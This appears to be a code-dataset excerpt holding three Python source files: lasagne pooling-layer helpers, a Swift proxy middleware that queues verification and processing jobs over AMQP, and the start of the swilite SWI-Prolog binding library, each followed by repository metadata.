mean_pool = lambda pool_size=(2, 2): lambda incoming: layers.Pool2DLayer(incoming, pool_size=pool_size, mode='average_inc_pad')
floating_meanpool = lambda pool_size=(2, 2): lambda incoming: layers.Pool2DLayer(
incoming,
pool_size=(pool_size[0] // 2 * 3, pool_size[0] // 2 * 3),
stride=pool_size,
pad=(pool_size[0] // 2, pool_size[1] // 2),
mode='average_inc_pad'
)
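# Illustrative sketch (not part of the original module): chaining these layer
# factories into a small lasagne network. The input shape and filter counts
# are invented for the example; it only runs if lasagne/theano are installed.
def _example_small_net():
  net = layers.InputLayer(shape=(None, 1, 28, 28))
  net = conv(16)(net)      # 3x3 convolution, 16 filters, leaky ReLU
  net = max_pool()(net)    # 2x2 max pooling
  net = conv1x1(8)(net)    # channel-mixing 1x1 convolution
  return net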
global_pool = lambda f=None: lambda incoming: layers.GlobalPoolLayer(incoming, pool_function=f) | mit | -6,815,556,254,835,466,000 | 32.542169 | 127 | 0.71254 | false |
vindeka/gateswift | gateswift/middleware.py | 1 | 5131 | # Copyright (c) 2013 Vindeka, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kombu
from swift.common.utils import get_logger
from swift.common.swob import Request, HTTPOk, HTTPBadRequest, HTTPNotFound
class GateMiddleware(object):
"""
Gate middleware for swift communication.
Add to your pipeline in proxy-server.conf, such as::
[pipeline:main]
pipeline = catch_errors cache tempauth gatemiddleware proxy-server
And add a gatemiddleware filter section, such as::
[filter:gatemiddleware]
use = egg:gateswift#gatemiddleware
amqp_connection = amqp://guest:guest@localhost/
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = get_logger(conf, log_route='gatemiddleware')
self.conn_str = conf.get('amqp_connection', 'amqp://localhost/')
self.exc_str = conf.get('amqp_exchange', 'gate')
self.exc_type = conf.get('amqp_exchange_type', 'direct')
self.exc_durable = bool(conf.get('amqp_exchange_durable', 'True'))
def __call__(self, env, start_response):
self.logger.debug('Initialising gate middleware')
req = Request(env)
try:
version, account, rest = req.split_path(1, 3, True)
except ValueError:
return HTTPNotFound(request=req)(env, start_response)
if account == 'gate':
# Handles direct calls to gate
return HTTPOk(request=req)(env, start_response)
if 'X-Gate-Verify' in env:
verify = env['X-Gate-Verify']
self.logger.debug('Verification request: %s algorithms: %s' % (req.path, verify))
try:
version, account, container, obj = req.split_path(4, 4, True)
except ValueError:
return HTTPBadRequest(request=req)(env, start_response)
algorithms = verify.split(',')
for algo in algorithms:
metakey = 'X-Object-Meta-Gate-%s' % algo.upper()
if metakey not in env:
self.logger.debug('Invalid verification request, object missing: %s' % (metakey))
return HTTPBadRequest(request=req)(env, start_response)
if self.publish_verify(req.path, algorithms):
for algo in algorithms:
statuskey = 'X-Object-Meta-Gate-Verify-%s-Status' % algo.upper()
env[statuskey] = 'Queued'
env['X-Object-Meta-Gate-Verify'] = verify
if 'X-Gate-Process' in env:
module = env['X-Gate-Process']
self.logger.debug('Process request: %s module: %s' % (req.path, module))
try:
version, case, container, obj = req.split_path(4, 4, True)
except ValueError:
return HTTPBadRequest(request=req)(env, start_response)
if self.publish_process(req.path, module):
env['X-Object-Meta-Gate-Process'] = module
env['X-Object-Meta-Gate-Process-Status'] = 'Queued'
# TODO: Inspect the response to see if this is a fake object
response = self.app(env, start_response)
return response
def publish_verify(self, path, algorithms):
""" Publish a verify request on the queue to gate engine """
exchange = kombu.Exchange(self.exc_str, self.exc_type, durable=self.exc_durable)
queue = kombu.Queue('verify', exchange=exchange, routing_key='verify')
with kombu.Connection(self.conn_str) as connection:
with connection.Producer(serializer='json') as producer:
producer.publish({'path':path, 'algorithms':algorithms},
exchange=exchange, routing_key='verify', declare=[queue])
return True
def publish_process(self, path, module):
""" Publish a process request on the queue to gate engine """
exchange = kombu.Exchange(self.exc_str, self.exc_type, durable=self.exc_durable)
queue = kombu.Queue('process', exchange=exchange, routing_key='process')
with kombu.Connection(self.conn_str) as connection:
with connection.Producer(serializer='json') as producer:
producer.publish({'path':path, 'module':module},
exchange=exchange, routing_key='process', declare=[queue])
return True
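# Illustrative sketch (not part of the original module): what a gate-engine
# consumer for the messages published above could look like. The queue and
# exchange settings mirror publish_verify(); the callback body and the helper
# name are invented for the example.
def _example_verify_consumer(conn_str='amqp://guest:guest@localhost/'):
    """ Drain one batch of verify requests and print them """
    exchange = kombu.Exchange('gate', 'direct', durable=True)
    queue = kombu.Queue('verify', exchange=exchange, routing_key='verify')

    def on_message(body, message):
        # body is the dict published by publish_verify()
        print(body['path'], body['algorithms'])
        message.ack()

    with kombu.Connection(conn_str) as connection:
        with connection.Consumer(queue, callbacks=[on_message]):
            connection.drain_events(timeout=5)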
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return GateMiddleware(app, conf)
return auth_filter
| apache-2.0 | 8,751,585,938,849,223,000 | 38.469231 | 101 | 0.618008 | false |
EdTsft/swilite | swilite/prolog.py | 1 | 50967 | """An object-oriented interface to Prolog."""
from collections import namedtuple
from ctypes import (
POINTER,
byref,
c_char,
c_double,
c_int,
c_int64,
c_size_t,
c_void_p,
)
from swilite.core import (
BUF_DISCARDABLE,
CVT_WRITEQ,
PL_ATOM,
PL_BLOB,
PL_DICT,
PL_FLOAT,
PL_INTEGER,
PL_LIST_PAIR,
PL_NIL,
PL_Q_CATCH_EXCEPTION,
PL_Q_NODEBUG,
PL_STRING,
PL_TERM,
PL_VARIABLE,
PL_atom_chars,
PL_call,
PL_call_predicate,
PL_chars_to_term,
PL_close_foreign_frame,
PL_close_query,
PL_cons_functor,
PL_cons_functor_v,
PL_cons_list,
PL_context,
PL_copy_term_ref,
PL_discard_foreign_frame,
PL_erase,
PL_exception,
PL_functor_arity,
PL_functor_name,
PL_get_arg,
PL_get_atom,
PL_get_atom_nchars,
PL_get_bool,
PL_get_compound_name_arity,
PL_get_float,
PL_get_functor,
PL_get_head,
PL_get_int64,
PL_get_list,
PL_get_module,
PL_get_name_arity,
PL_get_nchars,
PL_get_nil,
PL_get_pointer,
PL_get_string_chars,
PL_get_tail,
PL_is_acyclic,
PL_is_atom,
PL_is_atomic,
PL_is_callable,
PL_is_compound,
PL_is_float,
PL_is_functor,
PL_is_ground,
PL_is_integer,
PL_is_list,
PL_is_number,
PL_is_pair,
PL_is_string,
PL_is_variable,
PL_module_name,
PL_new_atom,
PL_new_functor,
PL_new_module,
PL_new_term_ref,
PL_new_term_refs,
PL_next_solution,
PL_open_foreign_frame,
PL_open_query,
PL_pred,
PL_predicate,
PL_predicate_info,
PL_put_atom,
PL_put_atom_nchars,
PL_put_bool,
PL_put_float,
PL_put_functor,
PL_put_int64,
PL_put_list,
PL_put_list_nchars,
PL_put_nil,
PL_put_pointer,
PL_put_string_nchars,
PL_put_term,
PL_put_variable,
PL_record,
PL_recorded,
PL_register_atom,
PL_rewind_foreign_frame,
PL_term_type,
PL_unify,
PL_unify_arg,
PL_unify_atom,
PL_unify_atom_nchars,
PL_unify_bool,
PL_unify_compound,
PL_unify_float,
PL_unify_functor,
PL_unify_int64,
PL_unify_list,
PL_unify_list_nchars,
PL_unify_nil,
PL_unify_pointer,
PL_unify_string_nchars,
PL_unregister_atom,
REP_UTF8,
atom_t,
functor_t,
module_t,
state as prolog_state,
)
_term_type_code_name = {
PL_VARIABLE: 'variable',
PL_ATOM: 'atom',
PL_INTEGER: 'integer',
PL_FLOAT: 'float',
PL_STRING: 'string',
PL_TERM: 'compound',
PL_NIL: 'nil',
PL_BLOB: 'blob',
PL_LIST_PAIR: 'list-pair',
PL_DICT: 'dict',
}
__all__ = [
'Atom',
'Frame',
'Functor',
'Module',
'Predicate',
'PrologCallFailed',
'PrologException',
'PrologMemoryError',
'Query',
'Term',
'TermList',
'TermRecord',
]
class PrologException(Exception):
"""An exception raised within the Prolog system."""
def __init__(self, exception_term):
super().__init__()
self.exception_term = exception_term
def __str__(self):
return "Prolog Exception:\n{!s}".format(self.exception_term)
def __repr__(self):
return 'PrologException({!r})'.format(self.exception_term)
class PrologCallFailed(RuntimeError):
"""A call failed."""
def __init__(self, msg):
super().__init__()
self.msg = msg
def __str__(self):
return str(self.msg)
class PrologMemoryError(Exception):
"""Prolog stack is out of memory."""
pass
class HandleWrapper(object):
"""Class wrapping a handle."""
def __init__(self, handle):
self._handle = handle
@classmethod
def _from_handle(cls, handle):
"""Initialize from an existing handle."""
if handle is None:
# When the handle truly is 0, ctypes interprets the value as None.
# Undo the mistake here.
# Unfortunately, this means we can't warn about None being passed
# when it's an error.
handle = 0
if not isinstance(handle, int):
raise ValueError('Handle must be an int, not {}'.format(
type(handle).__name__))
new_obj = cls.__new__(cls)
HandleWrapper.__init__(new_obj, handle=handle)
return new_obj
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self._handle == other._handle
def __ne__(self, other):
return not self == other
class TemporaryHandleMixIn(object):
"""Mixin for `HandleWrapper` where the handle can be invalidated."""
_valid = True
def __init__(self):
super().__init__()
def _get_handle(self):
if self._valid:
return self.__handle
raise AttributeError('handle been invalidated')
def _set_handle(self, handle):
self.__handle = handle
_handle = property(fget=_get_handle, fset=_set_handle)
def _invalidate(self):
"""Invalidate the handle."""
self._valid = False
class ConstantHandleToConstantMixIn(object):
"""`HandleWrapper` mixin where `_handle` is constant and refers to a
constant object.
"""
def __hash__(self):
return hash(self._handle)
def _decode_ptr_len_string(ptr, length, encoding='utf8'):
"""Decode a string from a ctypes pointer and length."""
return ptr[:length.value].decode(encoding)
class Atom(HandleWrapper):
"""Prolog Atom Interface"""
def __init__(self, name):
"""Create a named atom."""
super().__init__(handle=PL_new_atom(name.encode()))
@classmethod
def _from_handle(cls, handle):
"""Create an Atom object from an existing atom handle."""
new_atom = super()._from_handle(handle)
PL_register_atom(new_atom._handle)
return new_atom
def __str__(self):
return self.get_name()
def __repr__(self):
return 'Atom(name={name!r})'.format(name=self.get_name())
def __del__(self):
if prolog_state.is_available:
PL_unregister_atom(self._handle)
def __copy__(self):
"""A new `Atom` object pointing to the same atom."""
return self._from_handle(self._handle)
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
# Atoms can have different handles but the same name.
return self.get_name() == other.get_name()
def __hash__(self):
return hash(self.get_name())
def get_name(self):
"""The atom's name as a string."""
return PL_atom_chars(self._handle).decode()
class Functor(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Functor Interface"""
def __init__(self, name, arity):
"""Create a functor.
Args:
name (Atom): Name of the functor.
Either Atom object or string, the former is more efficient.
arity (int): Arity of the functor.
"""
try:
name_handle = name._handle
except AttributeError:
name_handle = Atom(name=name)._handle
super().__init__(handle=PL_new_functor(name_handle, arity))
def __str__(self):
return "{name}/{arity}".format(name=self.get_name(),
arity=self.get_arity())
def __repr__(self):
return "Functor(name={name!r}, arity={arity!r})".format(
name=self.get_name(), arity=self.get_arity())
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return (self.get_name() == other.get_name() and
self.get_arity() == other.get_arity())
def __hash__(self):
return hash((self.get_name(), self.get_arity()))
def __call__(self, *args):
"""Returns a new compound term created from this functor and `args`.
The length of `args` must be the same as the arity of `functor`.
See `Term.from_cons_functor`.
"""
return Term.from_cons_functor(self, *args)
def get_name(self):
"""The functor's name as an `Atom` object."""
return Atom._from_handle(PL_functor_name(self._handle))
def get_arity(self):
"""The functor's arity as an integer."""
return PL_functor_arity(self._handle)
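# Illustrative sketch (not part of the original module): building a compound
# term from a Functor. The names 'likes', 'alice' and 'bob' are invented;
# assumes SWI-Prolog has been initialised by swilite.core.
def _example_functor_usage():
    likes = Functor('likes', 2)
    alice = Term.from_atom_name('alice')
    bob = Term.from_atom_name('bob')
    fact = likes(alice, bob)   # same as Term.from_cons_functor(likes, alice, bob)
    return str(fact)           # roughly 'likes(alice,bob)'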
class Module(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Module Interface"""
def __init__(self, name):
"""Finds existing module or creates a new module with given name.
Args:
name (Atom): Name of the module.
"""
super().__init__(handle=PL_new_module(name._handle))
def __str__(self):
return str(self.get_name())
def __repr__(self):
return 'Module(name={name!r})'.format(name=self.get_name())
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self.get_name() == other.get_name()
def __hash__(self):
return hash(self.get_name())
@classmethod
def current_context(cls):
"""Returns the current context module."""
return cls._from_handle(PL_context())
def get_name(self):
"""The name of the module as an `Atom` object."""
return Atom._from_handle(PL_module_name(self._handle))
class Predicate(HandleWrapper, ConstantHandleToConstantMixIn):
"""Prolog Predicate Interface"""
def __init__(self, functor, module=None):
"""Create a predicate from a functor.
Args:
functor (Functor): Functor used to create the predicate.
module (Module) : Module containing the functor.
If ``None``, uses the current context module.
"""
super().__init__(
handle=PL_pred(functor._handle, _get_nullable_handle(module)))
@classmethod
def from_name_arity(cls, name, arity, module_name=None):
"""Create a predicate directly from Python's built-in types.
Args:
name (str) : Name of functor used to create the predicate.
arity (int) : Arity of functor used to create the predicate.
module_name (str): Name of module containing the functor.
If ``None``, uses the current context module.
"""
return cls._from_handle(handle=PL_predicate(
name.encode(), arity,
module_name.encode() if module_name is not None else None))
def __str__(self):
info = self.get_info()
return '{module_prefix}{name}/{arity}'.format(
module_prefix=(str(info.module) + ':'
if info.module is not None else ''),
name=info.name,
arity=info.arity)
def __repr__(self):
info = self.get_info()
return 'Predicate(functor={functor!r}, module={module!r})'.format(
functor=Functor(name=info.name, arity=info.arity),
module=info.module)
def __eq__(self, other):
if type(other) is not type(self):
return NotImplemented
return self.get_info() == other.get_info()
def __hash__(self):
return hash(self.get_info())
def __call__(self, *arguments, arglist=None, goal_context_module=None,
check=False):
"""Call predicate with arguments.
Finds a binding for arguments that satisfies the predicate.
Like Query but only finds the first solution.
Args:
*arguments (Term) : Terms to pass as arguments to this
predicate.
arglist (TermList) : Arguments to this predicate.
Cannot pass both arguments and arglist.
goal_context_module (Module): Context module of the goal.
If ``None``, the current context module is used, or ``user`` if
there is no context. This only matters for meta_predicates.
check (bool) : Check that the call succeeded.
Returns:
bool: True if a binding for `arguments` was found.
Raises:
PrologException : If an exception was raised in Prolog.
PrologCallFailed: If the call failed and `check` is ``True``.
"""
if arglist is None:
arglist = TermList.from_terms(*arguments)
elif arguments:
raise ValueError('Cannot provide both "arguments" and "arglist".')
self.check_argument_match(arglist)
success = bool(PL_call_predicate(
_get_nullable_handle(goal_context_module),
PL_Q_NODEBUG | PL_Q_CATCH_EXCEPTION,
self._handle,
arglist._handle))
if check and not success:
raise PrologCallFailed(str(self))
return success
Info = namedtuple('Info', ['name', 'arity', 'module'])
def get_info(self):
"""Returns name, arity, and module of this predicate.
Returns:
Predicate.Info:
"""
name = atom_t()
arity = c_int()
module = module_t()
PL_predicate_info(self._handle,
byref(name), byref(arity), byref(module))
return self.Info(name=Atom._from_handle(name.value),
arity=arity.value,
module=Module._from_handle(module.value))
def check_argument_match(self, arguments):
"""Check that the right number of arguments are given.
Args:
arguments (TermList): List of arguments.
Raises:
ValueError : If the number of arguments does not match
the predicate's arity.
"""
number_of_arguments = len(arguments)
arity = self.get_info().arity
if number_of_arguments != arity:
raise ValueError(
('number of arguments ({nargs}) does not match '
'predicate arity ({arity})').format(
nargs=number_of_arguments,
arity=arity))
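# Illustrative sketch (not part of the original module): asserting a fact and
# querying it through Predicate.__call__. The predicate and atom names are
# invented; assumes SWI-Prolog has been initialised by swilite.core.
def _example_predicate_call():
    assertz = Predicate.from_name_arity('assertz', 1)
    assertz(Term.from_parsed('parent(tom, bob)'), check=True)
    parent = Predicate.from_name_arity('parent', 2)
    child = Term()
    found = parent(Term.from_atom_name('tom'), child)
    return found, str(child)   # (True, 'bob') once the binding succeeds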
class Term(HandleWrapper):
"""Prolog Term Interface."""
_equality_predicate = Predicate.from_name_arity(name='==', arity=2)
_logical_or_functor = Functor(';', 2)
_logical_and_functor = Functor(',', 2)
def __init__(self):
"""Initialize a new term. The term is initially a variable."""
super().__init__(handle=PL_new_term_ref())
def __str__(self):
"""A Prolog string representing this term."""
return self.get_chars()
def __repr__(self):
return ('Term(handle={handle!r}, type={type!r}, value={value!r})'
.format(handle=self._handle, type=self.type(),
value=self.get_chars()))
def __eq__(self, other):
"""Check if two terms have the same value. Does not perform unification.
"""
try:
return self._equality_predicate(self, other)
except AttributeError as e:
if '_handle' not in str(e):
raise
return NotImplemented
def __or__(self, other):
"""Logical OR of two terms."""
return self._logical_or_functor(self, other)
def __and__(self, other):
"""Logical AND of two terms."""
return self._logical_and_functor(self, other)
def __int__(self):
"""Integer representation of this term (if it stores an integer)."""
return self.get_integer()
def __float__(self):
"""Float representation of this term (if it stores a float)."""
return self.get_float()
def __deepcopy__(self, memo):
"""Creates a new Prolog term, copied from the old."""
return self.from_term(self)
def type(self):
"""Term type as a string.
Returns one of the following strings:
* ``variable``
* ``atom``
* ``integer``
* ``float``
* ``string``
* ``term``
* ``nil``
* ``blob``
* ``list-pair``
* ``dict``
"""
type_code = PL_term_type(self._handle)
return _term_type_code_name[type_code]
def is_acyclic(self):
"""True if this is an acyclic term."""
return bool(PL_is_acyclic(self._handle))
def is_atom(self):
"""True if this term is an atom."""
return bool(PL_is_atom(self._handle))
def is_atomic(self):
"""True if this term is atomic.
A term is atomic if it is not variable or compound.
"""
return bool(PL_is_atomic(self._handle))
def is_callable(self):
"""True if this term is callable.
A term is callable if it is compound or an atom.
"""
return bool(PL_is_callable(self._handle))
def is_compound(self):
"""True if this term is compound.
A compound term is a functor with arguments.
"""
return bool(PL_is_compound(self._handle))
def is_float(self):
"""True if this term is a float."""
return bool(PL_is_float(self._handle))
def is_functor(self, functor):
"""True if this term is compound and its functor is `functor`.
Args:
functor (Functor): Check if this is the functor of `self`.
"""
return bool(PL_is_functor(self._handle, functor._handle))
def is_ground(self):
"""True if this term is a ground term.
A ground term is a term that holds no free variables.
"""
return bool(PL_is_ground(self._handle))
def is_integer(self):
"""True if this term is an integer."""
return bool(PL_is_integer(self._handle))
def is_list(self):
"""True if this term is a list.
A term is a list if it is:
* a compound term using the list constructor (`is_pair`); or
* the list terminator (`is_nil`).
Note:
This definition is weaker than what is used by the prolog predicate
``is_list``, which has the additional constraint that the 2nd term
in the list pair also be a list.
For example,
>>> Term.from_parsed('[1|2]').is_list()
True
>>> Term.from_parsed('is_list([1|2])')()
False
"""
return bool(PL_is_list(self._handle))
def is_nil(self):
"""True if this term is the list terminator.
The list terminator is the constant ``[]``.
"""
return bool(PL_get_nil(self._handle))
def is_number(self):
"""True if this term is an integer or float."""
return bool(PL_is_number(self._handle))
def is_pair(self):
"""True if this term is a compound term using the list constructor."""
return bool(PL_is_pair(self._handle))
def is_string(self):
"""True if this term is a string."""
return bool(PL_is_string(self._handle))
def is_variable(self):
"""True if this term is a variable."""
return bool(PL_is_variable(self._handle))
@staticmethod
def _require_success(return_code):
assert bool(return_code)
@staticmethod
def _require_success_expecting_type(return_code, *required_types):
assert required_types
if not bool(return_code):
if len(required_types) == 1:
type_str = required_types[0]
elif len(required_types) == 2:
type_str = '{} or {}'.format(*required_types)
else:
type_str = '{}, or {}'.format(
', '.join(required_types[:-1],),
required_types[-1])
raise TypeError('Term is not {a} {type}.'.format(
a=('an' if type_str[0].lower() in 'aeiou' else 'a'),
type=type_str))
def get_atom(self):
"""An `Atom` object representing this term, if it is a prolog atom."""
a = atom_t()
self._require_success_expecting_type(
PL_get_atom(self._handle, byref(a)),
'atom')
return Atom._from_handle(a.value)
def get_atom_name(self):
"""The value of this term as a string, if it is a prolog atom."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success_expecting_type(
PL_get_atom_nchars(self._handle, byref(length), byref(s)),
'atom')
return _decode_ptr_len_string(s, length)
def get_string_chars(self):
"""The value of this term as a string, if it is a prolog string."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success_expecting_type(
PL_get_string_chars(self._handle, byref(s), byref(length)),
'string')
return _decode_ptr_len_string(s, length)
def get_chars(self):
"""Representation of this term as a string in Prolog syntax."""
s = POINTER(c_char)()
length = c_size_t()
self._require_success(
PL_get_nchars(self._handle,
byref(length),
byref(s),
CVT_WRITEQ | BUF_DISCARDABLE | REP_UTF8))
return _decode_ptr_len_string(s, length, encoding='utf8')
def get_integer(self):
"""The value of this term as an integer, if it is an integer or
compatible float.
"""
i = c_int64()
self._require_success_expecting_type(
PL_get_int64(self._handle, byref(i)),
'integer', 'int-compatible float')
return i.value
def get_bool(self):
"""The value of this term as a boolean, if it is `true` or `false`."""
i = c_int()
self._require_success_expecting_type(
PL_get_bool(self._handle, byref(i)),
'boolean')
return bool(i.value)
def get_pointer(self):
"""The value of this term as an integer address, if it is a pointer."""
p = c_void_p()
self._require_success_expecting_type(
PL_get_pointer(self._handle, byref(p)),
'pointer')
return p.value
def get_float(self):
"""The value of this term as a float, if it is an integer or float."""
f = c_double()
self._require_success_expecting_type(
PL_get_float(self._handle, byref(f)),
'float', 'integer')
return f.value
def get_functor(self):
"""A `Functor` object representing this term, if it is a compound term
or atom."""
functor = functor_t()
self._require_success_expecting_type(
PL_get_functor(self._handle, byref(functor)),
'compound term', 'atom')
return Functor._from_handle(functor.value)
NameArity = namedtuple('NameArity', ['name', 'arity'])
def get_name_arity(self):
"""The name and arity of this term, if it is a compound term or an atom.
Compound terms with arity 0 give the same result as an atom.
To distinguish them use `is_compound` and/or `get_compound_name_arity`.
Returns:
NameArity: namedtuple (name, arity)
"""
name = atom_t()
arity = c_int()
self._require_success_expecting_type(
PL_get_name_arity(self._handle, byref(name), byref(arity)),
'compound term', 'atom')
return self.NameArity(name=Atom._from_handle(name.value),
arity=arity.value)
def get_compound_name_arity(self):
"""The name and arity of this term, if it is a compound term.
The same as `get_name_arity` but fails for atoms.
Returns:
NameArity: Named tuple of name (`string`) and arity (`int`).
"""
name = atom_t()
arity = c_int()
self._require_success_expecting_type(
PL_get_compound_name_arity(self._handle, byref(name),
byref(arity)),
'compound term')
return self.NameArity(name=Atom._from_handle(name.value),
arity=arity.value)
def get_module(self):
"""A `Module` object corresponding to this term, if it is an atom."""
module = module_t()
self._require_success_expecting_type(
PL_get_module(self._handle, byref(module)),
'atom')
return Module._from_handle(module.value)
def get_arg(self, index):
"""A new term with a reference to an argument of this term.
Args:
index (int): Index of the argument.
Index is 0-based, unlike in Prolog.
Returns:
Term: A new term reference to the argument.
Raises:
AssertionError: If `index` is out of bounds or
if this term is not compound.
Note: This returns a _new_ term, not the argument term itself.
Therefore, using `put_*` methods on the return value will not
change the argument itself, while unification will.
"""
t = Term()
self._require_success(
PL_get_arg(index + 1, self._handle, t._handle))
return t
HeadTail = namedtuple('HeadTail', ['head', 'tail'])
def get_list_head_tail(self):
"""Get the head and tail of the list represented by this term.
Returns:
HeadTail: Named tuple of head and tail, both `Term` objects.
"""
head = Term()
tail = Term()
self._require_success_expecting_type(
PL_get_list(self._handle, head._handle, tail._handle),
'list')
return self.HeadTail(head=head, tail=tail)
def get_list_head(self):
"""The head of the list represented by this term.
Returns:
Term:
"""
head = Term()
self._require_success_expecting_type(
PL_get_head(self._handle, head._handle),
'list')
return head
def get_list_tail(self):
"""The tail of the list represented by this term.
Returns:
Term:
"""
tail = Term()
self._require_success_expecting_type(
PL_get_tail(self._handle, tail._handle),
'list')
return tail
def get_nil(self):
"""Succeeds if this term represents the list termination constant (nil).
Raises:
AssertionError: If this term does not represent nil.
"""
self._require_success(
PL_get_nil(self._handle))
def put_variable(self):
"""Put a fresh variable in this term, resetting it to its initial state.
"""
PL_put_variable(self._handle)
def put_atom(self, atom):
"""Put an atom in this term.
Args:
atom (Atom): Atom to put in this term.
"""
PL_put_atom(self._handle, atom._handle)
def put_bool(self, val):
"""Put a boolean in this term.
Puts either the atom ``true`` or the atom ``false``.
"""
PL_put_bool(self._handle, int(bool(val)))
def put_atom_name(self, atom_name):
"""Put an atom in this term, constructed from a string name.
Args:
atom_name (str): Name of the atom to put in this term.
"""
encoded_atom_name = atom_name.encode()
PL_put_atom_nchars(self._handle,
len(encoded_atom_name),
encoded_atom_name)
def put_string(self, string):
"""Put a string in the term."""
encoded_string = string.encode()
self._require_success(
PL_put_string_nchars(self._handle,
len(encoded_string),
encoded_string))
def put_list_chars(self, bytes_):
"""Put a byte string in the term as a list of characters."""
self._require_success(
PL_put_list_nchars(self._handle, len(bytes_), bytes_))
def put_integer(self, val):
"""Put an integer in the term."""
self._require_success(
PL_put_int64(self._handle, val))
def put_pointer(self, address):
"""Put an integer address in the term."""
self._require_success(
PL_put_pointer(self._handle, address))
def put_float(self, val):
"""Put a floating-point value in the term."""
self._require_success(
PL_put_float(self._handle, val))
def put_functor(self, functor):
"""Put a compound term created from a functor in this term.
The arguments of the compound term are __TEMPORARY__ variables.
To create a term with instantiated arguments or with persistent
variables, use `put_cons_functor`.
Warning:
The arguments of the returned compound term are not persistent.
References to the arguments (e.g. using `get_arg`) may be
invalidated by the prolog system after other API calls.
Either use `put_cons_functor` or get a new reference to the
arguments each time they are needed.
"""
self._require_success(
PL_put_functor(self._handle, functor._handle))
def put_list(self):
"""Put a list pair in this term, whose head and tail are variables.
Like `put_functor` but using the ``[|]`` functor.
"""
self._require_success(
PL_put_list(self._handle))
def put_nil(self):
"""Put the list terminator constant in this term."""
self._require_success(
PL_put_nil(self._handle))
def put_term(self, term):
"""Set this term to reference the new term."""
PL_put_term(self._handle, term._handle)
@classmethod
def from_term(cls, term):
"""Create a new term as a copy of an existing one."""
return cls._from_handle(handle=PL_copy_term_ref(term._handle))
def put_parsed(self, string):
"""Parse `string` as Prolog and place the result in this term.
Args:
string (str): A term string in Prolog syntax.
Optionally ends with a full-stop (.)
Raises:
PrologException: If the parse fails.
The exception is also stored in this term.
"""
success = PL_chars_to_term(string.encode(), self._handle)
if not success:
raise PrologException(self)
def put_cons_functor(self, functor, *args):
"""Set this term to a compound term created from `functor` and `args`.
The length of `args` must be the same as the arity of `functor`.
"""
functor_arity = functor.get_arity()
if functor_arity != len(args):
raise TypeError(
('Functor arity ({arity}) does not match '
'number of arguments ({nargs}).').format(
arity=functor_arity, nargs=len(args)))
if not all(isinstance(arg, Term) for arg in args):
raise TypeError(
'All arguments after `functor` must be `Term` objects.')
if len(args) > 4:
# PL_cons_functor segfaults when passed > 4 arguments
return self.put_cons_functor_v(functor, TermList.from_terms(*args))
self._require_success(
PL_cons_functor(self._handle, functor._handle,
*[arg._handle for arg in args]))
def put_cons_functor_v(self, functor, args):
"""Set this term to a compound term created from `functor` and args.
Args:
functor (Functor): Functor used to create the compound term.
args (TermList) : A term list of arguments.
"""
self._require_success(
PL_cons_functor_v(self._handle,
functor._handle,
args._handle))
def put_cons_list(self, head, tail):
"""Set this term to a list constructed from head and tail."""
self._require_success(
PL_cons_list(self._handle, head._handle, tail._handle))
def put_list_terms(self, terms):
"""Set this term to a list constructed from a list of terms.
Args:
terms (list): A (python) list of terms.
"""
try:
head = terms.pop(0)
except IndexError:
self.put_nil()
return
tail = Term.from_nil()
while terms:
tail = Term.from_cons_list(terms.pop(), tail)
self.put_cons_list(head, tail)
def __call__(self, context_module=None, check=False):
"""Call term like once(term).
Attempts to find an assignment of the variables in the term that
makes the term true.
Args:
context_module (Module): Context module of the goal.
check (bool) : Check that the call succeeded.
Returns:
bool: True if the call succeeded.
Raises:
PrologCallFailed: If the call failed and `check` is ``True``.
"""
success = bool(PL_call(self._handle,
_get_nullable_handle(context_module)))
if check and not success:
raise PrologCallFailed(str(self))
return success
def unify(self, term):
"""Unify with a term.
Functionally equivalent to:
`Predicate.from_name_arity('=', 2)(self, term)`
Returns:
bool: True if the unification was successful
Even if this returns false, the unification may have partially
completed and variables will remain bound. Use with `Frame` to
completely undo bindings in the event of failure.
"""
return bool(PL_unify(self._handle, term._handle))
def unify_atom(self, atom):
"""Unify with an atom.
Returns:
bool: True on success.
"""
return bool(PL_unify_atom(self._handle, atom._handle))
def unify_bool(self, val):
"""Unify with a boolean.
Returns:
bool: True on success.
"""
return bool(PL_unify_bool(self._handle, int(bool(val))))
def unify_atom_name(self, atom_name):
"""Unify with an atom given by its name.
Returns:
bool: True on success.
"""
encoded_atom_name = atom_name.encode()
return bool(PL_unify_atom_nchars(self._handle,
len(encoded_atom_name),
encoded_atom_name))
def unify_list_chars(self, bytes_):
"""Unify with a list of bytes.
Returns:
bool: True on success.
"""
return bool(PL_unify_list_nchars(self._handle, len(bytes_), bytes_))
def unify_string(self, string):
"""Unify with a string.
Returns:
bool: True on success.
"""
encoded_string = string.encode()
return bool(PL_unify_string_nchars(self._handle,
len(encoded_string),
encoded_string))
def unify_integer(self, val):
"""Unify with an integer.
Returns:
bool: True on success.
"""
return bool(PL_unify_int64(self._handle, val))
def unify_float(self, val):
"""Unify with a floating-point value.
Returns:
bool: True on success.
"""
return bool(PL_unify_float(self._handle, val))
def unify_pointer(self, address):
"""Unify with an integer address.
Returns:
bool: True on success.
"""
return bool(PL_unify_pointer(self._handle, address))
def unify_functor(self, functor):
"""Unify with a functor.
Unifies the functor, not any arguments.
If functor has arity 0, unifies with an atom.
Identical to `Term.unify_compound` except for arity-0 functors.
Returns:
bool: True on success.
"""
return bool(PL_unify_functor(self._handle, functor._handle))
def unify_compound(self, functor):
"""Unify with a compound functor.
Unifies the functor, not any arguments.
If functor has arity 0, unifies with an arity-0 compound term.
Identical to `Term.unify_functor` except for arity-0 functors.
Returns:
bool: True on success.
"""
